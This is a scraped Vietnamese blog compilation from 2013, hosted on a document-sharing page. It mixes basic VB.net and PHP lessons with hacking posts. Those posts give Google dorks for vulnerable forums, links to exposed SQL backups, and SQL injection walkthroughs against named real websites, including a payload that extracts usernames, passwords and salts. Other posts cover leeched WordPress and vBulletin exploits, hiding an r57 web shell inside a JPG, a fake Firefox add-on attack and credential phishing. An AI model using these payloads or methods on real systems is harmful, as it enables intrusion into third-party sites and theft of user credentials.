phishing addon firefox bằng backtrack

25 491 1
phishing addon firefox bằng backtrack

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Kĩ thuật này dùng để giả mạo addon firefox ,sau đó mở cổng mà có thể connect vào máy tính,có tác dụng trên mọi phiên bản win và firefox.Đầu tiên mở terminal của Backtrack lên type: msfupdate nếu chưa update exploit type: msfconsole Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 23:02 1 nhận xét: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Visual Basic căn bản VB.net là ngôn ngữ lập trình hướng đối tượng bậc cao.Theo mình đây là một ngôn ngữ rất mạch lạc ,dễ học và dễ nhớ.Chú ý là kiến thức mình học được đều là tự học,qua mạng,bạn bè.Không từ bất kì thầy cô nào,nên đôi khi một số điều mình hiểu ko đúng 100% .Có gì sai mong ai biết góp ý để mình hoàn thiện kiến thức. Bài 1:Cấu trúc vb.net và khai báo biến. Đầu tiên để làm quen với cấu trúc lệnh ta thực thi các ví dụ trên Console application cho dễ nhìn. Cấu trúc của Vb.net đc miêu ta như sau Public/Private Function/Sub Tên(Biến tham chiếu hoặc tham trị) Dim bien_1 As Kiểu_biến_1 'khai bao bien Dim bien_2 As Kiểu_biến_2 Command_1 Command_2 End Sub/Function ta thấy trong visual basic kết thúc các câu lệnh ko có kí tự ngắt lệnh,để kết thúc câu lệnh ta buộc phải xuống dòng,khác với các ngôn ngữ khác.Và để comment trên visual basic ta dùng dấu nháy đơn đặt trước comment. Ví dụ sau đây yêu cầu nhập 1 số nguyên và in ra bình phương của nó. Module Module1 Sub Main() Dim a As Integer 'khai báo biến a là kiểu integer Console.WriteLine("nhập giá trị a") a = Integer.Parse(Console.ReadLine()) Dim result As Integer = Chuongtrinh(a) Console.Write("gia tri binh phuong cua bien a:") Console.WriteLine(result) Console.ReadKey() End Sub Public Function Chuongtrinh(ByVal a) As Integer Return a * a End Function End Module Ví dụ như ta nhập vào là 3 thì kết quả in ra là --> gia tri binh phuong cua bien a:9 Ta dùng Console.ReadKey() để tạm dừng chương trình mà xem kết quả.Nếu như ko có câu lệnh này thì chạy xong nó tắt luôn.Ta chưa kịp nhìn thấy gì cả. Như ví dụ trên thì ta thấy có thể viết ra màn hình bằng 2 lệnh Console.Write() và Console.WriteLine(). 2 cái này nó khác nhau ở chỗ 1 cái in ra ở trên cùng một dòng và một cái in ra xong nó xuống dòng.Tương tự điều này cho Console.Read() và Console.ReadLine(). Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 13:40 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Thứ sáu, ngày 25 tháng một năm 2013 Căn Bản PHP Hiện nay nó khá nhiều ngôn ngữ viết web như asp,perl,php Mình định viết tất cả cho mọi người.Bài đầu tiên mình viết căn bản về lập trình PHP.Đây là 1 ngôn ngữ khá phổ biến.Rất nhiều mã nguồn đc viết bằng php.Bao nhiêu phần trăm thì mình không rõ.Nhưng đa số là php rồi. Để chạy đc file php thì mọi người có khá nhiều cách,cài localhost ,hay kiếm 1 cái host nào đấy,vất lên là chạy thôi. Bài 1. Chương trình php đầu tiên : Php có thể dễ dàng chèn vào nội dung của file html,hoặc có thể sinh ra mã html luôn Mình lấy 1 ví dụ <html> <title>vhbgroup family</title> </html> <body> <?php echo "đây là mã php đầu tiên của chúng ta"; ?> </body> </html> lưu lại demo.php cho lên host ta sẽ nhận đc --->đây là mã php đầu tiên của chúng ta Có thêm 1 số cách khai báo mã php ví dụ như dạng script <script language ="php"> echo "đây là mã php đầu tiên của chúng ta"; </script> hay dạng không định thức <? echo "đây là mã php đầu tiên của chúng ta"; ?> Để in ra cái gì đó thì ta dùng lệnh echo,print. (bởi vì ngôn ngữ php nó khá tương đồng với C nên ở đây chơi đc luôn print.Chúng ta sẽ bắt gặp khá nhiều sự tương đồng ở đây,ví dụ như khi ghi chú chẳng hạn có thể dùng # trong perl hoặc // trong C# /* */ trong C++ Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 20:38 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Thứ tư, ngày 16 tháng một năm 2013 hack forum với metod dnn tìm các forum lỗi với dork chính sau inurl:/portals/0/default.aspx inurl:/tabid/36/language/en-US/Default.aspx Mình tùy biến đi để có dork cho site việt nam nhé inurl:"/portals/0? site: vn Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 13:52 1 nhận xét: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook exploit vbulletin với thông qua backup Khi tạo backup,đôi khi database đc lưu trong thư mục backup ,thông qua việc này ta dùng dork hợp lí để lấy database đó về,lấy pass và login nhé. dork ví dụ như allinurl:forumbackup allinurl:forumbackup sql . victim ví dụ nè https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGEQFjAH&url=http%3A%2F %2Fwww.forzacentral.com%2Fbackup%2Fforumbackup-03032010- 6bb80.sql&ei=ew73UNvDPM364QSkmoCoDw&usg=AFQjCNET3jdjzfPWX6Op_tNHZL8aYk7AAw&sig2=Tkza NPIWY5_ed1ekfY1TOw&bvm=bv.41018144,d.bGE&cad=rja https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDwQFjAC&url=http%3A%2F %2Fwww.decoratingforum.com.au%2Fbackups%2Fforumbackup-18-09-2009- ceae8.sql&ei=tQ_3UIe7FMnc4QSRiIDQAg&usg=AFQjCNF7zSIWPRH- CJSRLFJpNbjrecSF_Q&sig2=CltQlV16h5vyh7J8dlAd3A&bvm=bv.41018144,d.bGE&cad=rja Được đăng bởi Bang Tuyet vào lúc 12:39 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Thứ hai, ngày 14 tháng một năm 2013 Một số cách bypass sqli Phần đầu mình lấy của Judon trong vhb Phần 1 Victim http://www.instintocigano.com.br/ Check sqli : http://www.instintocigano.com.br/artigos-de-baralho-cigano.php? id=131%27 Báo lỗi You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3 Thực hiện lệnh order by tìm cột lỗi http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 9-- // ko lỗi nhé http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 10-- // báo lỗi Unknown column '10' in 'order clause' =>> có 10 cột từ 0-9 Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 04:48 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Thứ bảy, ngày 12 tháng một năm 2013 [TUT] Uploading Shell Without Getting into Admin Panel [leech] [TUT] Uploading Shell Without Getting into Admin Panel I see lot of people SQL injecting and trying their hard luck to get in admin panel to upload a shell. - This Tutorial is not N00b friendly - If you use Tools for SQL injection don't bother reading this - Vulnerable Link : Code: http://www.trends-in-newsrooms.org/articles.php?id= There is total 14 Columns and i took 1 as visible Code: http://www.trends-in-newsrooms.org/artic .,4,5,6,7-- now try to see if you can load_file in the visible column We can read files in this server using this command. Usually you can exec this command if you have access to table mysql.users-- example : - 1 union all select load_file('filetoload'),2,3,4,5,6 from mysql.users-- Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 15:10 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Chèn code shell vào ảnh dùng backtrack Upload shell là 1 khâu rất là quan trọng trong local đúng hem nè,mà nhiều site nó chặn việc upload php,chỉ cho up ảnh,do đó tạo 1 con shell cái mà xem như 1 ảnh để ta up lên là 1 điều cần làm.Shell ảnh thì nhiều nguời có ùi,giờ mình chỉ làm cách tạo nó thui,sp có bảo là có thể tạo bằng photoshop,nhưng cách này của sp có vẻ dễ hơn,từ nay ta có thể tạo bất kì con shell bằng file ảnh nhé. Dùng icon2php download ở đây, đem về giải nén ra desktop nha (dùng unrar x iCon2PHP.rar) giải nén ra ta đc thư mục iCon2PHP cd iCon2PHP chạy tiếp lệnh python iCon2PHP.py nhé nó sẽ hiện lên 2 đường dẫn,đường dẫn đầu là đường dẫn file ảnh cần chén code,đường dẫn sau là đường dẫn shell. sau đây mình add con r57.php vào capuchino.jpg nhé Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 14:30 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Thứ sáu, ngày 11 tháng một năm 2013 WordPress Gallery 3.8.3 Arbitrary File Read [leech] ################################################## ######################### # # Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability # # Author : IrIsT.Ir # # Discovered By : Beni_Vanda # # Home : http://IrIsT.Ir/forum/ # # Software Link : http://wordpress.org/extend/plugins/gallery-plugin/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : inurl:plugins/nextgen-gallery # ################################################## ############################################ # # Expl0iTs : # # [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR] # # ################################################## ######################### # # Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan # # and All Members In Www.IrIsT.Ir/forum # ################################################## ######################## Được đăng bởi Bang Tuyet vào lúc 16:52 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Cracking SHA 256 and SHA 512 linux/unix passwords If you’ve ever tried to crack passwords from a new ubuntu or other new linux’s, you may have noticed that John The Ripper cannot crack the hashes starting with $5$ or $6$. I had 2 passwords i needed to check. The passwords came from /etc/shadow from a newer Ubuntu version and i didnt even notice that the hash started with $6$ instead of the usual $1$. After searching and reading for a while, i found out that this is simply the newest generation of password hashes for linux. The “normal” hash ($1$) is MD5. The new ones are $5$ and $6$ and are SHA256 and SHA512 respectively. The implementation of SHA passwords in linux is done by Ulrich Drepper at RedHat and his original paper can be found here. Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 13:31 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Các loaị mã hóa 1.MySQL có 2 loại 60671c896665c3fa MySQL loại 16 kí tự 667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự 2.MD4 có 3 loại: bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự 3.MD5 có tới 5 dạng: 0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự 3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự $1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự $apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự. 4.MSCash 9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 5.SHA-1 có 2 loại: 7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 13:17 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Thứ ba, ngày 08 tháng một năm 2013 Thêm 1 số exploit vbulletin Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability ##################################### # # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://www.Vbulletin.com/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : intext:"Powered By Vbulletin 4.1.12" # ##################################### # # Expl0iTs : # # http://target.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql] # ##################################### # # Greats : B3HZ4D - nimaarek - Net.W0lf - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r # # 0x0ptim0us - TaK.FaNaR - m3hdi - F () rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - # # d3c0d3r - Samim.S - Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum # ############################# Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 15:23 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Tiếp tục exploit vBulletin với Awards System 4.0.2+ SQL Injection dork thì sáng tạo ra nha Ở đây mình dùng dork: inurl:request_award.php Powered by vBulletin® Version 4.0.2 vào site victim với dạng victim.com/request_award.php Khai thác bằng thêm data với cấu trúc như sau ,có thể dùng addon hackbar nha do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit -->victim.com/request_award.php Data:do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit Mình lấy ví dụ victim là trang ihabteens.com kết hợp command và query nó http://www.ihabteens.com/forums/request_award.php Post :do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 15:00 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Exploit 4.0.x bằng perl cho newbie Chạy perl xong Tạo file perl với nội dung #!/usr/bin/perl use IO::Socket; print q{ ####################################################################### # vBulletin? Version 4.0.1 Remote SQL Injection Exploit # # By th3.g4m3_0v3r # # our Site www.h4ck3r.in # # www.hackingcrackingtricks.blogspot.com # # Indian (th3.g4m3_0v3r@yahoo.com) # # Dork: Powered by vBulletin? Version 4.0.1 # Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 14:31 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Tiếp Tục Phần Khai Thác Vbulletin [sql trên shoutbox] 2 bài trứoc viết về vbb,tiếp tục mình viết nốt mấy bug còn lại ,bài này là lỗi sql trên shoutbox dork khai thác :inurl:infernoshout.php ra một số trang thêm vào đuôi victim tìm đc đoạn như sau victim.com/folder/infernoshout.php?do=options&area=commands Mình demo trên http://bien19.biz/forum/infernoshout.php?do=options&area=commands hiện ra như sau Như thấy nó hiện ra 4 khung,khung đầu nhập vào đoạn query là Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 13:50 Không có nhận xét nào: Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Thứ hai, ngày 07 tháng một năm 2013 vbulletin CSRF attack - Add plugin & Upload shell . để giả mạo addon firefox ,sau đó mở cổng mà có thể connect vào máy tính,có tác dụng trên mọi phiên bản win và firefox. Đầu tiên mở terminal của Backtrack. Program :firefox Url/Host:http://www.facebook.com login hoặc Program :firefox Url/Host:http://www.yahoo.com login tùy cái cần tìm mà nhập nhá vì dụ với Program:firefox

Ngày đăng: 09/12/2013, 23:33

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan